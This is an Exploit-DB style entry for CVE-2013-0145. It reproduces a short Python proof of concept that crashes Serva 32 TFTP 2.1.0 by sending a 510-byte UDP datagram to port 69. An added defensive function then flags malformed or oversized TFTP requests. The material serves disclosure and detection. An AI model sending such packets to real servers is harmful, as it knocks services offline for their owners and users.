Exploit Serva 32 TFTP 2.1.0 - Buffer Overflow (Denial of Service) (PoC)

Exploiter

18 Dec 2022
EDB-ID: 25472
EDB verification: Passed
Author: SAPLING
Vulnerability type: DOS
Platform: WINDOWS
CVE: cve-2013-0145
Publication date: 2013-05-15
Code:
#Serva 32 TFTP Buffer overflow DoS
#
#05/14/2013
#Sapling
#Vendor homepage http://www.vercot.com/
#Software Link:
#http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip
#Version 2.1.0 only; prior versions are not vulnerable
#Tested on Windows 8, Windows 7, Windows XP SP1-3
#CVE to be established today or tomorrow.
#
#This is the Serva 32 Proof Of Concept exploit discovered and written by Sapling. At this
#time the exploit is only a denial of service but evidence shows it may be controllable.
#The difficulty with controlling it at this point was the failure to overwrite the SEH
#chains or bypass them. The crash occurs when sending a message longer than 509 bytes

#start of python file
import sys
import socket

new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
new.connect(('192.168.1.19', 69))
new.send('\x41'*510)
#end of python file
 
Source: www.exploit-db.com
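
A defensive check for the condition the PoC header describes, given here as an added example that is not part of the original post or the Exploit-DB entry: it validates a datagram addressed to UDP/69 against the RFC 1350 request layout and the 509-byte limit. The function name `inspect_tftp_request`, the use of 509 as a drop threshold (taken from the header comment), and the sample datagrams are assumptions made for illustration.

```python
import struct

# Assumption: threshold taken from the PoC header ("longer than 509 bytes").
MAX_REQUEST_LEN = 509
# RFC 1350: only RRQ (1) and WRQ (2) are valid as the first packet to port 69.
REQUEST_OPCODES = {1: "RRQ", 2: "WRQ"}
TRANSFER_MODES = {b"netascii", b"octet", b"mail"}


def inspect_tftp_request(datagram):
    """Return the reasons a datagram sent to UDP/69 should be dropped or alerted on.

    An empty list means the datagram is a well-formed RRQ/WRQ within the limit.
    Hypothetical helper for a filtering proxy or a network sensor.
    """
    findings = []
    if len(datagram) > MAX_REQUEST_LEN:
        findings.append("oversize: %d bytes" % len(datagram))
    if len(datagram) < 4:
        findings.append("truncated")
        return findings
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in REQUEST_OPCODES:
        findings.append("unexpected opcode 0x%04x" % opcode)
        return findings
    # Layout: filename NUL mode NUL [option NUL value NUL ...]
    fields = datagram[2:].split(b"\x00")
    if len(fields) < 3 or fields[-1] != b"":
        findings.append("fields not NUL-terminated")
        return findings
    filename, mode = fields[0], fields[1]
    if not filename:
        findings.append("empty filename")
    if mode.lower() not in TRANSFER_MODES:
        findings.append("unknown mode %r" % mode)
    return findings


if __name__ == "__main__":
    # Constructed samples: a normal read request and a 510-byte filler datagram.
    samples = [b"\x00\x01boot.img\x00octet\x00", b"\x41" * 510]
    for sample in samples:
        print(len(sample), inspect_tftp_request(sample) or "ok")
```

A legitimate request carrying RFC 2347 options can approach 512 bytes, so on a network that uses long option lists the length finding is better treated as an alert than as a hard drop.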
